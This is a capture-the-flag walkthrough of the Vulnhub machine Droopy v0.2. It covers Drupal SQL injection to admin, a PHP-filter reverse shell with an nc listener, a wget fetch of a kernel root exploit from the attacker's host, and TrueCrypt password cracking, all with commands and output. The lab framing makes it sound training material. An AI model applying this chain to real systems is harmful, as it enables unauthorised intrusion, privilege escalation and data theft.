Droopy: v0.2 from Vulnhub
Nmap scan result
# Nmap 6.49BETA4 scan initiated Sun Jun 19 08:07:56 2016 as: nmap -Pn -T5 -o nmap_result 192.168.0.111
Warning: 192.168.0.111 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.0.111
Host is up (0.00026s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:48:50:BF (Cadmus Computer Systems)
Limited Shell
The website on port 80 is based on Drupal 7. First I tried scanning it with droopescan.
# droopescan scan drupal -u http://192.168.0.112/ -t 8
[+] No themes found.
[+] Possible interesting urls found:
Default changelog file - http://192.168.0.112/CHANGELOG.txt
[+] Possible version(s):
7.30
[+] No plugins found.
[+] Scan finished (0:00:04.024569 elapsed)
Then I found an SQL injection exploit for Drupal Core <= 7.32. Modifing the $url is necessary. After firing it up, we’ll receive the success message.
# php 34993.php
Success! Log in with username "admin" and password "admin" at http://192.168.0.112/user/login
Now let’s verify if it exploited correctly.
Okay! We’re logged in as admin. Time to search for futher vulnerabilities.
By browsing the Modules page, there’s an interesting module called ‘PHP filter’ which might be useful to get an reverse shell.
Let’s get the checkbox checked and save the configuration. Now press Add content->Basic page, put the reverse shell code in the Body textbox. Finally, choose the Text format to PHP code.
Before pressing the Preview button, make sure you already have netcat listening.
# nc -lvp 6666
listening on [any] 6666 ...
192.168.0.112: inverse host lookup failed: Unknown host
connect to [192.168.0.105] from (UNKNOWN) [192.168.0.112] 49779
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
09:16:53 up 4 min, 0 users, load average: 0.02, 0.11, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Privilege Escalation
By doing some enumeration, we can see the system is Ubuntu 14.04, and the Kernel version is 3.13.0-43-generic.
# uname -a
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
# cat /etc/os-release
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
There’s an exploit that will give us the root privilege. All you need to do is to download it, compile it to an executable file, then run the exploit.
$ cd /tmp
$ wget http://192.168.0.105:8000/37292.c -O exp.c
--2016-06-21 09:18:44-- http://192.168.0.105:8000/37292.c
Connecting to 192.168.0.105:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/plain]
Saving to: 'exp.c'
0K ..... 100% 1.09G=0s
2016-06-21 09:18:44 (1.09 GB/s) - 'exp.c' saved [5123/5123]
$ gcc -o exp.c exp
gcc: error: exp: No such file or directory
gcc: fatal error: no input files
compilation terminated.
$ gcc -o exp exp.c
$ ./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
Capther the flag
# ls -al /root
total 5148
drwx------ 3 root root 4096 Apr 12 13:51 .
drwxr-xr-x 22 root root 4096 Apr 10 12:02 ..
-rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc
drwx------ 2 root root 4096 Apr 10 12:02 .cache
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw------- 1 root root 3771 Apr 11 13:11 .viminfo
-rw-r--r-- 1 root root 5242880 Apr 12 13:18 dave.tc
When I got the root privilege, I thought this boot2root machine is done. But it’s weird that there’s no flag file in the root directory, only a large data file called dave.tc is found. Then I went back to vulnhub and check the description again.
It tells us to ‘read other people’s mail’. And there is a mail found under /var/mail.
# cat /var/mail/www-data
From Dave <dave@droopy.example.com> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <dave@droopy.example.com>
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN
George,
I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?
I'm sure you'll figure it out it won't rockyou too much!
If you are still struggling, remember that song by The Jam
Later,
Dave
So, the dave.tc file is an encrypted file, which has a password not longer than 11 characters. The ‘.tc’ file extension may indicated this file is encrypted with TrueCrypt. Hence I will try to crack with truecrack.
The second hint said that we might need the rockyou wordlist. But now we know the password is less than 11 characters. So I will make a custome wordlist first to save some time.
# cat rockyou.txt | awk 'length($0)<12' > my_wordlist
# cat my_wordlist | wc -l
12770785
There are too many lines in this file, I don’t think it is worth to run the whole wordlist. So I checked the mail again, then decided to use ‘academy’ and ‘Academy’ to make the wordlists smaller.
root@kali:~/Security/droopy# grep academy my_wordlist > academy_wordlist
root@kali:~/Security/droopy# cat academy_wordlist | wc -l
94
root@kali:~/Security/droopy# grep Academy my_wordlist > Academy_wordlist
root@kali:~/Security/droopy# cat Academy_wordlist | wc -l
5
Now I have two smaller wordlists, then we can try them with truecrack.
root@kali:~/Security/droopy# truecrack -t dave.tc -w academy_wordlist
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com
No found password
Total computations: "94"
root@kali:~/Security/droopy# truecrack -t dave.tc -w Academy_wordlist
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com
No found password
Total computations: "5"
It ran fast. But both of them failed.
I couldn’t find any other method to crack the TrueCrypt files. But I noticed something in the truecrack help:
-k --key <ripemd160 | sha512 | whirlpool> Key derivation function (default ripemd160).
Maybe dave.tc is encrypted with different key derivation function. So I ran the command again with ‘-k sha512’.
# truecrack -t dave.tc -w academy_wordlist -k sha512
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com
Found password: "etonacademy"
Password length: "12"
Total computations: "40"
We got the password! All we need to do is, to find the tool available to decrypt the TrueCrypt file. After spending some time googling, I found cryptsetup might be useful.
# cryptsetup open --type tcrypt ./dave.tc davetc
Enter passphrase:
# mkdir /media/davetc
# mount /dev/mapper/davetc /media/davetc
# cd /media/davetc
# ls -alR
.:
total 20
drwxr-xr-x 6 root root 1024 Apr 12 20:00 .
drwxr-xr-x 4 root root 4096 Jun 21 21:49 ..
drwxr-xr-x 2 root root 1024 Apr 12 19:54 buller
drwx------ 2 root root 12288 Apr 12 19:53 lost+found
drwxr-xr-x 2 root root 1024 Apr 12 19:58 panama
drwxr-xr-x 3 root root 1024 Apr 12 20:02 .secret
./buller:
total 11
drwxr-xr-x 2 root root 1024 Apr 12 19:54 .
drwxr-xr-x 6 root root 1024 Apr 12 20:00 ..
-rw-r--r-- 1 root root 8393 Oct 5 2013 BullingdonCrest.jpg
./lost+found:
total 13
drwx------ 2 root root 12288 Apr 12 19:53 .
drwxr-xr-x 6 root root 1024 Apr 12 20:00 ..
./panama:
total 52
drwxr-xr-x 2 root root 1024 Apr 12 19:58 .
drwxr-xr-x 6 root root 1024 Apr 12 20:00 ..
-rw-r--r-- 1 root root 49257 Jun 16 2014 shares.jpg
./.secret:
total 64
drwxr-xr-x 3 root root 1024 Apr 12 20:02 .
drwxr-xr-x 6 root root 1024 Apr 12 20:00 ..
-rw-r--r-- 1 root root 61118 Feb 25 16:57 piers.png
drwxr-xr-x 2 root root 1024 Apr 12 20:16 .top
./.secret/.top:
total 3
drwxr-xr-x 2 root root 1024 Apr 12 20:16 .
drwxr-xr-x 3 root root 1024 Apr 12 20:02 ..
-r-------- 1 root root 872 Apr 12 20:16 flag.txt
Now we see the flag here.
# cat ./.secret/.top/flag.txt
################################################################################
# ___ ___ _ _ ___ ___ _ _____ _ _ _ _ _____ ___ ___ _ _ ___ #
# / __/ _ \| \| |/ __| _ \ /_\_ _| | | | | /_\_ _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ | / / _ \| | | |_| | |__ / _ \| | | | (_) | .` |\__ \ #
# \___\___/|_|\_|\___|_|_\/_/ \_\_| \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
# #
################################################################################
Firstly, thanks for trying this VM. If you have rooted it, well done!
Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
--knightmare
Finally, don’t forget to unmount and close the volume.
# umount /media/davetc
# cryptsetup close davetc